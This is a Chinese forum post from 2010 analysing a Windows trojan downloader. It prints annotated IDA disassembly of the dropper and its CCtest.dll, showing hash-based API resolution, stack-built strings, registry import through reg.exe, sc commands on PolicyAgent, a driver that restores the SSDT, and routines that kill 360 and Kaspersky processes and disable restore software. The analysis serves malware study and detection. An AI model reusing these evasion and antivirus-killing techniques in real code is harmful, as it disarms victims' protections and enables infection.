[旧帖] [原创]某个下载器分析(求邀请码) 0.00雪花
发表于: 2010-7-6 08:46 2192
【使用工具】: OD1.1 + IDA5.5
【操作平台】: XP-SP3
主要行为:
1.释放文件CCtest.inf,CCtest.sys,CCtest.dll,ring0恢复SSDT,做掉安全软件进程,ring0映像劫持安全软件进程
2.做掉安全软件进程后,释放XXXXscdXXXX.exe下载大量木马
3.释放文件tmpacik.tmp干掉还原
母体文件释放了五个文件3120.reg、
CCtest.inf、CCtest.sys、CCtest.dll、 [用于做掉安全软件]
XXXXscdXXXX.exe(XXX为随机名)、 [下载大量木马]
tmpacik.tmp(dll文件) [用于干掉还原软件]
tmpacik.tmp(dll文件)又释放了文件pcidump.sys
建立互斥体防止多个实例同时运行
.Upack:0041EB94 add esp, 30h
.Upack:0041EB97 ; .Upack:0041EB97
.Upack:0041EBA0 建立互斥体防止多个实例同时运行
.Upack:0041EBA0
.Upack:0041EBA0 loc_41EBA0: ; CODE XREF: start+BFj
.Upack:0041EBA0 push offset Name ; "LDMMOO."
.Upack:0041EBA5 push ebx ; bInitialOwner
.Upack:0041EBA6 push ebx ; lpMutexAttributes
.Upack:0041EBA7 call CreateMutexA
.Upack:0041EBAD call GetLastError
.Upack:0041EBB3 cmp eax, 0B7h
.Upack:0041EBB8 jnz short loc_41EBC1
.Upack:0041EBBA push ebx ; uExitCode
.Upack:0041EBBB call ExitProcess
比对函数的Hash值,获取函数地址
.Upack:0041EC08 call GetSystemDirectoryA
.Upack:0041EC0E push 774393E8h
.Upack:0041EC13 push 1
.Upack:0041EC15 call __GetProcessAddressByHashValue ; GetModuleFileNameA,
.Upack:0041EC15 ; 比对函数的Hash值,获取函数地址
.Upack:0041EC15 ;
.Upack:0041EC1A lea ecx, [ebp+lpszModuleFileName]
.Upack:0041EC20 push esi
.Upack:0041EC21 push ecx
.Upack:0041EC22 push ebx
.Upack:0041EC23 call eax ; GetModuleFileNameA
进入__GetProcessAddressByHashValue 看看吧
通过计算函数名的Hash值获取函数地址
.Upack:0041F0AF loc_41F0AF: ; CODE XREF: __GetProcessAddressByHashValue+96j
.Upack:0041F0AF mov ecx, [ebp+nFlag]
.Upack:0041F0B2 test ecx, ecx
.Upack:0041F0B4 jz short JMPAndRet ; Kernel32获取失败跳走
.Upack:0041F0B6 mov eax, [ecx+IMAGE_DOS_HEADER.e_lfanew] ; PE头
.Upack:0041F0B9 mov esi, [eax+ecx+IMAGE_NT_HEADERS.OptionalHeader.DataDirectory.VirtualAddress] ; 输出表地址RAV
.Upack:0041F0BD lea edx, [eax+ecx+IMAGE_NT_HEADERS.OptionalHeader] ; 取可选头地址
.Upack:0041F0C1 mov eax, [ebp+HashValue]
.Upack:0041F0C4 add esi, ecx ; 输出表地址VA
.Upack:0041F0C6 shr eax, 10h
.Upack:0041F0C9 test ax, ax
.Upack:0041F0CC mov [ebp+lpOptionHeaders], edx
.Upack:0041F0CF jnz short loc_41F0DA
.Upack:0041F0D1 movzx eax, word ptr [ebp+HashValue]
.Upack:0041F0D5 sub eax, [esi+IMAGE_EXPORT_DIRECTORY.Base]
.Upack:0041F0D8 jmp short loc_41F134
.Upack:0041F0DA ; ---------------------------------------------------------------------------
.Upack:0041F0DA
.Upack:0041F0DA loc_41F0DA: ; CODE XREF: __GetProcessAddressByHashValue+10Aj
.Upack:0041F0DA mov ebx, [esi+IMAGE_EXPORT_DIRECTORY.AddressOfNames]
.Upack:0041F0DD mov eax, [esi+IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals]
.Upack:0041F0E0 and [ebp+dwIndex], 0 ; 初始化计数器
.Upack:0041F0E4 add ebx, ecx ; ENT,导出名字表地址
.Upack:0041F0E6 add eax, ecx ; EOT,导出序号表地址
.Upack:0041F0E8 cmp [esi+IMAGE_EXPORT_DIRECTORY.NumberOfNames], 0 ; 判断按名字导出的是否为0
.Upack:0041F0EC mov [ebp+lpExportTableAddress], eax
.Upack:0041F0EF jbe short loc_41F114 ; 小于等于0跳走
.Upack:0041F0F1 搜索Kernel32的ENT,逐一比较函数名的Hash值
.Upack:0041F0F1
.Upack:0041F0F1 loc_41F0F1: ; CODE XREF: __GetProcessAddressByHashValue+14Dj
.Upack:0041F0F1 mov eax, [ebx] ; 取出一个导出函数名RAV
.Upack:0041F0F3 add eax, [ebp+nFlag] ; 导出函数名VA
.Upack:0041F0F6 push eax ; lpszExportFuncName
.Upack:0041F0F7 call ComputedHashValue ; 计算出函数名的Hash值
.Upack:0041F0FC cmp eax, [ebp+HashValue] ; 对比Hash是否相同
.Upack:0041F0FF pop ecx ; 清栈
.Upack:0041F100 jz short loc_41F126 ; Hash相同证明函数名已经找到
.Upack:0041F102 inc [ebp+dwIndex] ; 计数器加1
.Upack:0041F105 add [ebp+lpExportTableAddress], 2 ; 序号表地址向后移动
.Upack:0041F109 mov eax, [ebp+dwIndex]
.Upack:0041F10C add ebx, 4 ; 移动到下一个导出函数名
.Upack:0041F10F cmp eax, [esi+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
.Upack:0041F112 jb short loc_41F0F1 ; 跳走继续查找下一个函数名
.Upack:0041F114
.Upack:0041F114 loc_41F114: ; CODE XREF: __GetProcessAddressByHashValue+12Aj
.Upack:0041F114 mov eax, [ebp+HashValue]
.Upack:0041F117
.Upack:0041F117 loc_41F117: ; CODE XREF: __GetProcessAddressByHashValue+167j
.Upack:0041F117 mov ecx, [ebp+dwIndex]
.Upack:0041F11A cmp ecx, [esi+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
.Upack:0041F11D jnz short loc_41F12E ; 取出Kernel32基址
.Upack:0041F11F
.Upack:0041F11F JMPAndRet: ; CODE XREF: __GetProcessAddressByHashValue+EFj
.Upack:0041F11F xor eax, eax
.Upack:0041F121 jmp Ret
.Upack:0041F126 ; ---------------------------------------------------------------------------
.Upack:0041F126
.Upack:0041F126 loc_41F126: ; CODE XREF: __GetProcessAddressByHashValue+13Bj
.Upack:0041F126 mov eax, [ebp+lpExportTableAddress]
.Upack:0041F129 movzx eax, word ptr [eax] ; 取出序号
.Upack:0041F12C jmp short loc_41F117
.Upack:0041F12E ; ---------------------------------------------------------------------------
.Upack:0041F12E
.Upack:0041F12E loc_41F12E: ; CODE XREF: __GetProcessAddressByHashValue+158j
.Upack:0041F12E mov ecx, [ebp+nFlag] ; 取出Kernel32基址
.Upack:0041F131 mov edx, [ebp+lpOptionHeaders]
.Upack:0041F134
.Upack:0041F134 loc_41F134: ; CODE XREF: __GetProcessAddressByHashValue+113j
.Upack:0041F134 mov ebx, [esi+IMAGE_EXPORT_DIRECTORY.AddressOfFunctions]
.Upack:0041F137 lea eax, [ebx+eax*4]
.Upack:0041F13A mov ebx, [eax+ecx] ; 导出函数地址RAV
.Upack:0041F13D add ebx, ecx ; 计算出函数的RVA
.Upack:0041F13F mov eax, ebx ; 得到函数的VA
.Upack:0041F141 sub eax, esi
.Upack:0041F143 cmp eax, [edx+IMAGE_OPTIONAL_HEADER32.DataDirectory.Size]
.Upack:0041F146 jnb loc_41F1D8 ; 跳走并返回函数地址
释放文件并Kill大量的安全软件
.Upack:0041ED2D loc_41ED2D: ; CODE XREF: start+24Cj
.Upack:0041ED2D push 6FB89AF0h
.Upack:0041ED32 push 1
.Upack:0041ED34 call __GetProcessAddressByHashValue ; 获取CreateThread地址
.Upack:0041ED39 push ebx
.Upack:0041ED3A push ebx
.Upack:0041ED3B push ebx
.Upack:0041ED3C push offset lpfnThreadProc
.Upack:0041ED41 push ebx
.Upack:0041ED42 push ebx
.Upack:0041ED43 call eax ; CreateThread
.Upack:0041ED45 push 4000
.Upack:0041ED4A call __Sleep
.Upack:0041ED4F ; .Upack:0041ED4F
.Upack:0041ED58
.Upack:0041ED58 loc_41ED58: ; CODE XREF: start+277j
.Upack:0041ED58 call KillSafeSoft ; 释放文件并Kill大量的安全软件
.Upack:0041ED5D mov dword ptr [esp], 7D0h
.Upack:0041ED64 call __Sleep
进入KillSafeSoft
构建临时目录准备释放注册表文件
构建CMD字符串,用CMD命令把注册表文件导入到注册表
.Upack:0041E7AB 构建临时目录准备释放文件
.Upack:0041E7AB add esp, 18h
.Upack:0041E7AE lea eax, [ebp+lpszRegFileName]
.Upack:0041E7B4 push eax ; lpBuffer
.Upack:0041E7B5 push edi ; nBufferLength
.Upack:0041E7B6 call GetTempPathA
.Upack:0041E7BC mov esi, lstrcat
.Upack:0041E7C2 lea eax, [ebp+lpszRegFileName]
.Upack:0041E7C8 push offset a3120_reg ; "3120.reg"
.Upack:0041E7CD push eax
.Upack:0041E7CE call esi ; lstrcat
.Upack:0041E7D0 lea eax, [ebp+lpszRegFileName]
.Upack:0041E7D6 push eax ; lpFileName
.Upack:0041E7D7 call ReleaseRegFile ; 临时目录释放注册表文件"3120.reg"
.Upack:0041E7DC 为导入注册表构建CMD命令
.Upack:0041E7DC lea eax, [ebp+lpCMDImportReg]
.Upack:0041E7E2 mov dword ptr [esp], offset aImport ; "import "
.Upack:0041E7E9 push eax
.Upack:0041E7EA call lstrcpy
.Upack:0041E7F0 lea eax, [ebp+lpszRegFileName]
.Upack:0041E7F6 push eax
.Upack:0041E7F7 lea eax, [ebp+lpCMDImportReg]
.Upack:0041E7FD push eax
.Upack:0041E7FE call esi ; lstrcat
.Upack:0041E800 push ebx
.Upack:0041E801 lea eax, [ebp+lpCMDImportReg]
.Upack:0041E807 push ebx
.Upack:0041E808 push eax
.Upack:0041E809 push offset aReg_exe ; "reg.exe"
.Upack:0041E80E push offset aOpen ; "open"
.Upack:0041E813 push ebx
.Upack:0041E814 call __ShellExecuteA ; 释放的文件导入到注册表
更改IP 安全策略服务
.Upack:0041E823 push ebx
.Upack:0041E824 lea eax, [ebp+szCMDAuto]
.Upack:0041E827 push ebx
.Upack:0041E828 push eax ; "config PolicyAgent start= auto"
.Upack:0041E829 push offset aSc ; "sc"
.Upack:0041E82E push offset aOpen ; "open"
.Upack:0041E833 push ebx
.Upack:0041E834 call __ShellExecuteA ; 配置"IP 安全策略"服务为自动
.Upack:0041E839 push 7D0h
.Upack:0041E83E call __Sleep
.Upack:0041E843 push ebx
.Upack:0041E844 lea eax, [ebp+szCMDStop]
.Upack:0041E847 push ebx
.Upack:0041E848 push eax ; "stop PolicyAgent"
.Upack:0041E849 push offset aSc ; "sc"
.Upack:0041E84E push offset aOpen ; "open"
.Upack:0041E853 push ebx
.Upack:0041E854 call __ShellExecuteA ; 停止"IP 安全策略"服务
.Upack:0041E859 add esp, 50h
.Upack:0041E85C push 7D0h
.Upack:0041E861 call __Sleep
.Upack:0041E866 push ebx
.Upack:0041E867 lea eax, [ebp+szCMDStart]
.Upack:0041E86A push ebx
.Upack:0041E86B push eax ; "start PolicyAgent"
.Upack:0041E86C push offset aSc ; "sc"
.Upack:0041E871 push offset aOpen ; "open"
.Upack:0041E876 push ebx
.Upack:0041E877 call __ShellExecuteA ; 开始"IP 安全策略"服务
.Upack:0041E87C push 7D0h
.Upack:0041E881 call __Sleep
删除释放的注册表文件
.Upack:0041E886 lea eax, [ebp+lpszRegFileName]
.Upack:0041E88C push eax
.Upack:0041E88D call __DeleteFileA ; 删除释放的注册表文件
释放文件CCtest.inf,CCtest.sys准备加载驱动
.Upack:0041E93F 构建文件路径,准备释放文件
.Upack:0041E93F "c:\progra~1\\RAV\CCtest.inf"
.Upack:0041E93F "c:\progra~1\\RAV\CCtest.dll"
.Upack:0041E93F "c:\progra~1\\RAV\CCtest.sys"
.Upack:0041E93F
.Upack:0041E93F loc_41E93F: ; CODE XREF: KillSafeSoft+650j
.Upack:0041E93F lea eax, [ebp+Buffer]
.Upack:0041E945 push eax
.Upack:0041E946 lea eax, [ebp+InfName]
.Upack:0041E94C push eax
.Upack:0041E94D call edi ; lstrcpy
.Upack:0041E94F lea eax, [ebp+szCCtest_inf]
.Upack:0041E952 push eax
.Upack:0041E953 lea eax, [ebp+InfName]
.Upack:0041E959 push eax
.Upack:0041E95A call esi ; lstrcat
.Upack:0041E95C lea eax, [ebp+Buffer]
.Upack:0041E962 push eax
.Upack:0041E963 lea eax, [ebp+SysName]
.Upack:0041E969 push eax
.Upack:0041E96A call edi ; lstrcpy
.Upack:0041E96C lea eax, [ebp+CCtest_sys]
.Upack:0041E96F push eax
.Upack:0041E970 lea eax, [ebp+SysName]
.Upack:0041E976 push eax
.Upack:0041E977 call esi ; lstrcat
.Upack:0041E979 lea eax, [ebp+Buffer]
.Upack:0041E97F push eax
.Upack:0041E980 lea eax, [ebp+DllName]
.Upack:0041E986 push eax
.Upack:0041E987 call edi ; lstrcpy
.Upack:0041E989 lea eax, [ebp+szCCtest_dll]
.Upack:0041E98C push eax
.Upack:0041E98D lea eax, [ebp+DllName]
.Upack:0041E993 push eax
.Upack:0041E994 call esi ; lstrcat
.Upack:0041E996 ; .Upack:0041E996
.Upack:0041E99F
.Upack:0041E99F loc_41E99F: ; CODE XREF: KillSafeSoft+6B0j
.Upack:0041E99F lea eax, [ebp+InfName]
.Upack:0041E9A5 push eax ; lpszInfFileName
.Upack:0041E9A6 call ReleaseInfFile ; 释放文件"c:\progra~1\\RAV\CCtest.inf"
.Upack:0041E9AB test al, al
.Upack:0041E9AD pop ecx
.Upack:0041E9AE jz FailRet ; 释放文件失败跳走
.Upack:0041E9B4 lea eax, [ebp+SysName]
.Upack:0041E9BA push eax ; lpFileName
.Upack:0041E9BB call ReleaseSysFile ; 释放文件"c:\progra~1\\RAV\CCtest.Sys"
.Upack:0041E9C0 test al, al
.Upack:0041E9C2 pop ecx
.Upack:0041E9C3 jz FailRet ; 释放文件失败跳走
加载驱动
.Upack:0041E9CF push offset PropertyBuffer ; "*CCTestDevice"
.Upack:0041E9D4 push eax ; InfName
.Upack:0041E9D5 call LoadDriver ; 加载驱动
.Upack:0041E9DA push 3E8h
.Upack:0041E9DF call __Sleep
.Upack:0041E9E4 push ebx ; MemberIndex
.Upack:0041E9E5 push offset InterfaceClassGuid ; InterfaceClassGuid
.Upack:0041E9EA call EunuInterface ; 获取驱动句柄
.Upack:0041E9EF mov esi, eax
.Upack:0041E9F1 add esp, 14h
.Upack:0041E9F4 cmp esi, ebx
.Upack:0041E9F6 jnz short loc_41EA1A ; 成功跳走
加载CCtest.dll,并调用testall函数ring0恢复SSDT,做掉安全软件进程,ring0映像劫持安全软件进程
.Upack:0041EA5A lea eax, [ebp+DllName]
.Upack:0041EA60 push eax
.Upack:0041EA61 call __DeleteFileA
.Upack:0041EA66 pop ecx
.Upack:0041EA67 ; loc_41EA67
.Upack:0041EA70
.Upack:0041EA70 loc_41EA70: ; CODE XREF: KillSafeSoft+781j
.Upack:0041EA70 push 723EB0D5h
.Upack:0041EA75 push 1
.Upack:0041EA77 call __GetProcessAddressByHashValue ; 获取CloseHandle函数地址
.Upack:0041EA7C push esi
.Upack:0041EA7D call eax ; CloseHandle
.Upack:0041EA7F lea eax, [ebp+InfName]
.Upack:0041EA85 push eax ; InfName
.Upack:0041EA86 call UnloadDriver ; 卸载驱动
.Upack:0041EA8B lea eax, [ebp+InfName]
.Upack:0041EA91 push eax
.Upack:0041EA92 call __DeleteFileA ; 删除文件"c:\progra~1\\RAV\CCtest.inf"
.Upack:0041EA97 lea eax, [ebp+SysName]
.Upack:0041EA9D push eax
.Upack:0041EA9E call __DeleteFileA ; 删除文件"c:\progra~1\\RAV\CCtest.sys"
.Upack:0041EAA3 lea eax, [ebp+lpSubKey]
.Upack:0041EAA9 push eax
.Upack:0041EAAA push 80000002h
.Upack:0041EAAF call __RegDeleteKeyA
.Upack:0041EAB4 push ebx
.Upack:0041EAB5 lea eax, [ebp+szCMDStop]
.Upack:0041EAB8 push ebx
.Upack:0041EAB9 push eax
.Upack:0041EABA push offset aSc ; "sc"
.Upack:0041EABF push offset aOpen ; "open"
.Upack:0041EAC4 push ebx
.Upack:0041EAC5 call __ShellExecuteA ; 停止"IP 安全策略"服务
.Upack:0041EACA push 5DCh
.Upack:0041EACF call __Sleep
.Upack:0041EAD4 add esp, 2Ch
.Upack:0041EAD7
.Upack:0041EAD7 FailRet: ; CODE XREF: KillSafeSoft+6C2j
.Upack:0041EAD7 ; KillSafeSoft+6D7j
.Upack:0041EAD7 xor eax, eax
.Upack:0041EAD9
.Upack:0041EAD9 Ret: ; CODE XREF: KillSafeSoft+729j
.Upack:0041EAD9 pop edi
.Upack:0041EADA pop esi
.Upack:0041EADB pop ebx
.Upack:0041EADC leave
.Upack:0041EADD retn
.Upack:0041EADD KillSafeSoft endp
之后就是清理现场了,删除释放的文件
.Upack:0041EA1A loc_41EA1A: ; CODE XREF: KillSafeSoft+70Aj
.Upack:0041EA1A lea eax, [ebp+DllName]
.Upack:0041EA20 push eax ; lpFileName
.Upack:0041EA21 call ReleaseDllFile ; 释放文件"c:\progra~1\\RAV\CCtest.dll"
.Upack:0041EA26 test al, al
.Upack:0041EA28 pop ecx
.Upack:0041EA29 jz short loc_41EA67 ; 释放文件失败跳走
.Upack:0041EA2B lea eax, [ebp+DllName]
.Upack:0041EA31 push eax ; lpLibFileName
.Upack:0041EA32 call LoadLibraryA ; 加载释放的文件"c:\progra~1\\RAV\CCtest.dll
.Upack:0041EA38 mov edi, eax
.Upack:0041EA3A lea eax, [ebp+testall]
.Upack:0041EA3D push eax ; lpProcName
.Upack:0041EA3E push edi ; hModule
.Upack:0041EA3F call GetProcAddress ; 获"c:\progra~1\\RAV\CCtest.dll"
.Upack:0041EA3F ; 的testall函数地址
.Upack:0041EA45 push esi ; hDevice
.Upack:0041EA46 call eax ; 调用testall,ring0恢复SSDT,做掉安全软件进程,ring0映像劫持安全软件进程
.Upack:0041EA48 push 0BB8h
.Upack:0041EA4D call __Sleep
.Upack:0041EA52 pop ecx
.Upack:0041EA53 push edi ; hLibModule
.Upack:0041EA54 call FreeLibrary
.Upack:0041EA5A lea eax, [ebp+DllName]
.Upack:0041EA60 push eax
.Upack:0041EA61 call __DeleteFileA
回到主函数
做掉安全软件之后,就释放一个随机文件名的文件,开始下载大量木马
.Upack:0041ED92 lea eax, [ebp+szRandTempFileName]
.Upack:0041ED98 push eax ; lpBuffer
.Upack:0041ED99 push esi ; nBufferLength
.Upack:0041ED9A call GetTempPathA
.Upack:0041EDA0 ; .Upack:0041EDA0
.Upack:0041EDA9 nop
.Upack:0041EDAA
.Upack:0041EDAA loc_41EDAA: ; CODE XREF: start+2C9j
.Upack:0041EDAA call __GetTickCount ; 获取系统滴答数,以产生随机数
.Upack:0041EDAF 构建随机临时文件
.Upack:0041EDAF push eax
.Upack:0041EDB0 lea eax, [ebp+szRandTempFileName]
.Upack:0041EDB6 push eax
.Upack:0041EDB7 lea eax, [ebp+szRandTempFileName]
.Upack:0041EDBD push offset aScdD_exe ; "%scd%d.exe"
.Upack:0041EDC2 push eax ; LPSTR
.Upack:0041EDC3 call wsprintfA
.Upack:0041EDC9 lea eax, [ebp+szRandTempFileName]
.Upack:0041EDCF push eax ; lpszRandTempFileName
.Upack:0041EDD0 call ReleaseRandomTempFile ; 临时目录释放随机生成文件名的文件
.Upack:0041EDD5 nop
.Upack:0041EDD6 push ebx
.Upack:0041EDD7 push ebx
.Upack:0041EDD8 lea eax, [ebp+szRandTempFileName]
.Upack:0041EDDE push offset lpParameters
.Upack:0041EDE3 push eax
.Upack:0041EDE4 push 41CB18h
.Upack:0041EDE9 push ebx
.Upack:0041EDEA call __ShellExecuteA ; 运行随机生成文件名的文件,开始下载木马了
释放文件tmpacik.tmp并加载,调用killhy来做掉还原
.Upack:0041EE78 loc_41EE78: ; CODE XREF: start+397j
.Upack:0041EE78 lea eax, [ebp+tmpFileName] ; "C:\windows\system32\tmpacik.tmp"
.Upack:0041EE7E push eax ; lpFileName
.Upack:0041EE7F call ReleaseFile ; 系统目录下释放文件"tmpacik.tmp"
.Upack:0041EE84 test al, al
.Upack:0041EE86 pop ecx
.Upack:0041EE87 jz short loc_41EEE4 ; 释放文件失败跳走
.Upack:0041EE89 lea eax, [ebp+tmpFileName] ; "C:\windows\system32\tmpacik.tmp"
.Upack:0041EE8F push eax ; lpLibFileName
.Upack:0041EE90 call LoadLibraryA ; 加载释放的文件"C:\windows\system32\tmpacik.tmp"
.Upack:0041EE96 ; .Upack:0041EE96
.Upack:0041EE9F lea ecx, [ebp+killhy]
.Upack:0041EEA2 push ecx ; lpProcName
.Upack:0041EEA3
.Upack:0041EEA3 loc_41EEA3: ; CODE XREF: start+3BEj
.Upack:0041EEA3 push eax ; hModule
.Upack:0041EEA4 call GetProcAddress ; 获取killhy函数地址
.Upack:0041EEAA ; .Upack:0041EEAA
.Upack:0041EEB3
.Upack:0041EEB3 loc_41EEB3: ; CODE XREF: start+3D2
母体文件分析完毕
***********************************释放的文件CCtest.dll分析************************************
模块初始化时提升进程权限
.text:100027E0 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
.text:100027E0 ; Entry point of the dropped CCtest.dll. fdwReason is declared but never
.text:100027E0 ; tested, so this body runs on every attach/detach notification, not only
.text:100027E0 ; DLL_PROCESS_ATTACH. It calls the privilege-adjust routine (per the
.text:100027E0 ; write-up, this elevates the process's privileges), then resolves
.text:100027E0 ; GetModuleFileName through the hash constant 774393E8h (the same value the
.text:100027E0 ; dropper uses) and stores this module's own path in the global
.text:100027E0 ; lpszDllModuleFileName. Hash-resolved APIs never appear in the import
.text:100027E0 ; table, so detection has to key on the constants or on runtime behaviour.
.text:100027E0 ; Always returns TRUE (eax = 1).
.text:100027E0 public DllEntryPoint
.text:100027E0 DllEntryPoint proc near
.text:100027E0
.text:100027E0 hinstDLL = dword ptr 4
.text:100027E0 fdwReason = dword ptr 8
.text:100027E0 lpReserved = dword ptr 0Ch
.text:100027E0
.text:100027E0 call __AdjustTokenPrivilege ; privilege adjustment (body not shown in this listing)
.text:100027E5 push 774393E8h ; hash of GetModuleFileName, same constant as in the dropper
.text:100027EA push 1
.text:100027EC call GetProcAddressByHashValue ; resolve GetModuleFileName by hash
.text:100027F1 push 0FFh ; nSize
.text:100027F6 push offset lpszDllModuleFileName ; lpFilename, global buffer
.text:100027FB mov ecx, [esp+8+hinstDLL]
.text:100027FF push ecx ; hModule = this DLL
.text:10002800 call eax ; GetModuleFileName
.text:10002802 mov eax, 1 ; return TRUE regardless of what happened above
.text:10002807 retn 0Ch
.text:10002807 DllEntryPoint endp
CCtest.dll的testall接口分析
.text:10002670 ; Worker called from the exported testall entry (see the XREF). Takes the
.text:10002670 ; CCtest.sys device handle (hDriver) on the stack and runs the attack chain
.text:10002670 ; in sequence: restore the SSDT through the driver, check for ekrn.exe,
.text:10002670 ; kill the 360 processes, kill Kaspersky (KillAvp), kill a list of other
.text:10002670 ; security products, then apply the ring0 image hijack. The strings
.text:10002670 ; "ShellExecuteA" and "shell32.dll" are assembled one byte at a time on the
.text:10002670 ; stack and Sleep is resolved by hash (3D9972F5h, repeated below), so neither
.text:10002670 ; shows up in a strings dump or the import table. The push eax / nop / pop eax
.text:10002670 ; sequences between steps are junk filler with no effect on state.
.text:10002670 sub_10002670 proc near ; CODE XREF: testall+Ep
.text:10002670
.text:10002670 szShellExecute = byte ptr -1Ch
.text:10002670 szShell32_dll = byte ptr -0Ch
.text:10002670 hDriver = dword ptr 8
.text:10002670
.text:10002670 push ebp
.text:10002671 mov ebp, esp
.text:10002673 sub esp, 1Ch
.text:10002676 mov al, 'l' ; 'l' is shared by both stack strings below
.text:10002678 push esi
.text:10002679 mov [ebp+szShellExecute+3], al
.text:1000267C mov [ebp+szShellExecute+4], al
.text:1000267F mov [ebp+szShell32_dll+3], al
.text:10002682 mov [ebp+szShell32_dll+4], al
.text:10002685 mov [ebp+szShell32_dll+9], al
.text:10002688 mov [ebp+szShell32_dll+0Ah], al
.text:1000268B lea eax, [ebp+szShell32_dll]
.text:1000268E mov cl, 'e' ; 'e' shared by both strings
.text:10002690 xor dl, dl ; dl = 0, NUL terminator for both strings
.text:10002692 push eax ; lpLibFileName = szShell32_dll (finished below, before the call)
.text:10002693 mov [ebp+szShellExecute], 'S' ; build "ShellExecuteA" byte by byte on the stack
.text:10002697 mov [ebp+szShellExecute+1], 'h'
.text:1000269B mov [ebp+szShellExecute+2], cl
.text:1000269E mov [ebp+szShellExecute+5], 'E'
.text:100026A2 mov [ebp+szShellExecute+6], 'x'
.text:100026A6 mov [ebp+szShellExecute+7], cl
.text:100026A9 mov [ebp+szShellExecute+8], 'c'
.text:100026AD mov [ebp+szShellExecute+9], 'u'
.text:100026B1 mov [ebp+szShellExecute+0Ah], 't'
.text:100026B5 mov [ebp+szShellExecute+0Bh], cl
.text:100026B8 mov [ebp+szShellExecute+0Ch], 'A'
.text:100026BC mov [ebp+szShellExecute+0Dh], dl
.text:100026BF mov [ebp+szShell32_dll], 's' ; build "shell32.dll" byte by byte on the stack
.text:100026C3 mov [ebp+szShell32_dll+1], 'h'
.text:100026C7 mov [ebp+szShell32_dll+2], cl
.text:100026CA mov [ebp+szShell32_dll+5], '3'
.text:100026CE mov [ebp+szShell32_dll+6], '2'
.text:100026D2 mov [ebp+szShell32_dll+7], '.'
.text:100026D6 mov [ebp+szShell32_dll+8], 'd'
.text:100026DA mov [ebp+szShell32_dll+0Bh], dl
.text:100026DD call LoadLibraryA ; load shell32.dll
.text:100026E3 nop
.text:100026E4 lea ecx, [ebp+szShellExecute]
.text:100026E7 push ecx ; lpProcName = "ShellExecuteA"
.text:100026E8 push eax ; hModule
.text:100026E9 call GetProcAddress
.text:100026EF mov lpfnShellExecute, eax ; cached in a global; KillAvp calls through it later
.text:100026F4 ; .text:100026F4
.text:100026FC mov esi, [ebp+hDriver] ; esi = device handle, live for the rest of the function
.text:100026FF push esi
.text:10002700
.text:10002700 loc_10002700: ; CODE XREF: sub_10002670+89j
.text:10002700 call ReSSDT ; restore the SSDT through the driver (ring0)
.text:10002705 add esp, 4
.text:10002708 push eax ; junk filler: push/nop/nop/pop leaves state unchanged
.text:10002709 nop
.text:1000270A nop
.text:1000270B pop eax
.text:1000270C push 3D9972F5h ; hash of Sleep
.text:10002711 push 1
.text:10002713 call GetProcAddressByHashValue ; resolve Sleep by hash
.text:10002718 push 1000
.text:1000271D call eax ; Sleep(1000)
.text:1000271F push eax ; junk filler
.text:10002720 nop
.text:10002721 nop
.text:10002722 pop eax
.text:10002723 push offset String2 ; "hnuq1h{h"
.text:10002728 call DecryString ; decrypts to "ekrn.exe"
.text:1000272D push eax ; lpString1
.text:1000272E call GetProcessId ; walk the process list, return its PID (0 if absent)
.text:10002733 add esp, 8
.text:10002736 test eax, eax
.text:10002738 jnz short loc_10002756 ; ekrn.exe present: skip the 360 kill step
.text:1000273A push esi ; hDriver
.text:1000273B call Kill360Safe ; kill 360tray.exe / Zhudongfangyu.exe via the driver
.text:10002740 add esp, 4
.text:10002743 push 3D9972F5h ; hash of Sleep
.text:10002748 push 1
.text:1000274A call GetProcAddressByHashValue ; resolve Sleep by hash
.text:1000274F push 1000
.text:10002754 call eax ; Sleep(1000)
.text:10002756 ; loc_10002756
.text:10002762
.text:10002762 loc_10002762: ; CODE XREF: sub_10002670+EBj
.text:10002762 call KillAvp ; kill Kaspersky: disable its service, unload its modules,
.text:10002762 ; then taskkill avp.exe
.text:10002767 ; .text:10002767
.text:1000276B push 3D9972F5h ; hash of Sleep
.text:10002770 push 1
.text:10002772 call GetProcAddressByHashValue ; resolve Sleep by hash
.text:10002777 push 1000
.text:1000277C call eax ; Sleep(1000)
.text:1000277E ; .text:1000277E
.text:10002782 push esi ; hDriver
.text:10002783 call KillSafeSoft ; enumerate processes and kill a list of security products
.text:10002788 ; .text:10002788
.text:10002790 push esi ; hDriver
.text:10002791
.text:10002791 loc_10002791: ; CODE XREF: sub_10002670+11Dj
.text:10002791 call ImageExecuteFile ; ring0 image hijack of security-product processes
.text:10002796 add esp, 4
.text:10002799 push 3D9972F5h ; hash of Sleep
.text:1000279E push 1
.text:100027A0 call GetProcAddressByHashValue ; resolve Sleep by hash
.text:100027A5 push 3E8h
.text:100027AA call eax ; Sleep(1000)
.text:100027AC pop esi
.text:100027AD mov esp, ebp
.text:100027AF pop ebp
.text:100027B0 retn
.text:100027B0 sub_10002670 endp ; sp-analysis failed
.text:100027B0
.text:100027B0 ; ---------------------------------------------------------------------------
.text:100027B1 align 10h
.text:100027C0 ; Exported entry 1. testall
进入call ReSSDT看看,其call主要功能是恢复SSDT
调用NtQuerySystemInformation的0Bh号功能(SystemModuleInformation)获取当前内核的模块基址与内核模块名
.text:1000186F 获取系统模块
.text:1000186F mov esi, eax
.text:10001871 nop
.text:10001872 mov ecx, [ebp+pModules]
.text:10001875 lea eax, [ebp+dwNeededSize]
.text:10001878 push eax ; ReturnLength
.text:10001879 push 4 ; SystemInformationLength
.text:1000187B push ecx ; SystemInformation
.text:1000187C push 0Bh ; SystemModuleInformation
.text:1000187E call esi ; NtQuerySystemInformation
.text:10001880 nop
.text:10001881 cmp eax, 0C0000004h
.text:10001886 jnz Ret ; 失败跳走
.text:1000188C mov edx, [ebp+dwNeededSize]
.text:1000188F push edx ; dwBytes
.text:10001890 push 40h ; uFlags
.text:10001892 call GlobalAlloc
.text:10001898 mov ecx, [ebp+dwNeededSize]
.text:1000189B push edi
.text:1000189C push ecx
.text:1000189D push eax
.text:1000189E push 0Bh
.text:100018A0 mov [ebp+pModules], eax
.text:100018A3 call esi ; NtQuerySystemInformation
.text:100018A5 test eax, eax
.text:100018A7 jl Ret ; 失败跳走
.text:100018AD mov eax, [ebp+pModules]
.text:100018B0 xor ecx, ecx
.text:100018B2 mov cx, [eax+MODULES.smi.ModuleNameOffset]
.text:100018B6 mov edx, [eax+MODULES.smi.Base]
.text:100018B9 mov [ebp+hKernelBase], edx
